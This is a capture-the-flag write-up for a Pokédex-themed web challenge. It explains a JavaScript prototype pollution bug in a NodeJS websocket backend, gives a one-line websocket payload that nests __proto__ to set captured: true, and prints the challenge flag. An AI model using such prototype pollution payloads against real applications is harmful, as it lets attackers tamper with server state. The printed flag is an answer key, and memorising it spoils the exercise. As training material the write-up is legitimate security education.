1.6 KiB
Gotta Catch 'em All! (Really Fast)
Text
I am an aspiring new Pokémon trainer that is ready to explore the world and catch many Pokémon. Unfortunately, due to the COVID pandemic, everything will be going digital now. Professor Oak made us a game to play instead, and developed this Pokédex website to register all the Pokémon we caught in the game.
Gary, my rival, bragged to me that he managed to complete the entire Pokédex in under a minute. He probably didn't play the game at all and just selected all the Pokémon on the Pokédex. Whatever the case may be, I intend to beat him, legitimately or not.
The website is connected to a NodeJS backend with a web socket that keeps track of the Pokédex and its completion. Somehow, I must fool the backend that I captured all Pokémon in an insanely fast time, without looking too suspicious. And knowing Professor Oak's programming skills and the fact that its written in JavaScript, there's probably some kind of vulnerability I can abuse.
How To Solve
Difficulty: Advanced
There is a hint given when adding Poison-type Pokémon that there's a bug caused by the poison of the Pokémon that affects the shared prototype. You have to use prototype poisoning to inject the value captured: true into the shared prototype of all Pokémon (which is 2 levels up), or, alternatively, inject the property on all different Pokémon types (grass, water, fire, etc...):
webSocket.send('{"msg": "updatePokedex", "data": {"pokemon": "Bulbasaur", "values": {"__proto__": {"__proto__": {"captured": true}}}}}')
Flag
IGCTF{MissingNo}